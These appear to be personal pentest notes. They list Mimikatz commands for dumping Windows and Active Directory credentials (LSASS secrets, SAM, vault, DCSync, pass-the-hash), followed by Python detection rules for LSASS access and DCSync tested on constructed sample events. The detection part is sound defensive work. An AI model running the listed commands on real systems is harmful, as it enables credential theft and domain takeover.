Mimikatz - Things we can do!!

Run "privilege::debug" (acquires SeDebugPrivilege) and "token::elevate" (impersonates the SYSTEM token) before dumping anything!!!!

  • Dumping cached AD credentials -

    sekurlsa::logonpasswords and sekurlsa::tickets

  • Dumping local credentials -

    lsadump::sam and lsadump::secrets

  • Dumping vault creds -

    vault::cred

  • Dumping creds via DCSync -

    lsadump::dcsync /user:<domain>\<user>    # use the short (NetBIOS) domain name, e.g. "corp" if the domain is "corp.com"

  • Pass the Hash attack -

    sekurlsa::pth #Check notion for whole command
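As the defensive counterpart to the two noisiest items above (LSASS memory reads behind sekurlsa::logonpasswords and lsadump::sam, and the replication rights behind lsadump::dcsync), here is detection logic written for this page; it is an added example, not part of the original notes or of Mimikatz. The event records are constructed sample data shaped like Sysmon Event ID 10 (ProcessAccess) and Security Event ID 4662, flattened to dicts; the process allowlist and the set of domain controller accounts are assumptions to tune per environment.

```python
"""Detection logic for two behaviours listed above: a process reading LSASS
memory (sekurlsa::logonpasswords) and a non-DC account using replication
rights (lsadump::dcsync). Added example, not from the original notes."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# Bit in the Sysmon Event 10 GrantedAccess mask that allows reading LSASS memory.
PROCESS_VM_READ = 0x0010
# Masks commonly reported when a credential dumper opens LSASS
# (0x1010 = VM_READ | QUERY_INFORMATION; 0x1fffff = PROCESS_ALL_ACCESS).
KNOWN_DUMPER_MASKS = {0x1010, 0x1410, 0x1438, 0x143A, 0x1FFFFF}

# Extended-rights GUIDs a DCSync must hold on the domain object (fixed AD values).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# ASSUMPTION: processes allowed to read LSASS on this host; tune per environment.
LSASS_READERS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


@dataclass
class Alert:
    rule: str
    host: str
    detail: str


def detect_lsass_access(events: Iterable[Dict]) -> List[Alert]:
    """Flag Sysmon Event 10 records where a non-allowlisted process opened
    lsass.exe with read access to its memory."""
    alerts: List[Alert] = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue
        target = ev.get("TargetImage", "").lower()
        if not target.endswith(r"\lsass.exe"):
            continue
        source = ev.get("SourceImage", "").lower()
        if source in LSASS_READERS_ALLOWLIST:
            continue
        access = int(ev.get("GrantedAccess", "0x0"), 16)  # Sysmon logs hex text
        if not access & PROCESS_VM_READ:
            continue
        label = "known dumper mask" if access in KNOWN_DUMPER_MASKS else "VM_READ set"
        alerts.append(Alert("lsass_access", ev.get("Computer", "?"),
                            f"{source} opened lsass.exe with 0x{access:x} ({label})"))
    return alerts


def detect_dcsync(events: Iterable[Dict], dc_accounts: Set[str]) -> List[Alert]:
    """Flag Security Event 4662 records where a principal other than a domain
    controller machine account exercised the replication extended rights."""
    dc_upper = {a.upper() for a in dc_accounts}
    alerts: List[Alert] = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        used = sorted(g for g in REPLICATION_GUIDS if g in props)
        if not used:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in dc_upper:  # DCs replicate with each other legitimately
            continue
        alerts.append(Alert("dcsync", ev.get("Computer", "?"),
                            f"{subject} used replication rights {used}"))
    return alerts


def run_detections(events: Iterable[Dict], dc_accounts: Set[str]) -> List[Alert]:
    events = list(events)
    return detect_lsass_access(events) + detect_dcsync(events, dc_accounts)


# CONSTRUCTED sample records (not real telemetry), one benign and one bad per rule.
SAMPLE_EVENTS = [
    {"EventID": 10, "Computer": "WS01", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "Computer": "WS01", "SourceImage": r"C:\Users\alice\Downloads\mk.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "WS01", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1010"},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "DC02$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "bob",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "bob",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},
]
DC_ACCOUNTS = {"DC01$", "DC02$"}  # ASSUMPTION: machine accounts of the domain's DCs

if __name__ == "__main__":
    for a in run_detections(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"[{a.rule}] {a.host}: {a.detail}")
```

On the sample data this yields exactly two alerts: the unknown binary reading LSASS with the 0x1010 mask, and the user account "bob" exercising DS-Replication-Get-Changes. In production, feed it parsed Sysmon and Security events and keep the allowlist tight; the 4662 rule also needs the "Directory Service Access" audit subcategory enabled on the DCs, or the event is never written.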
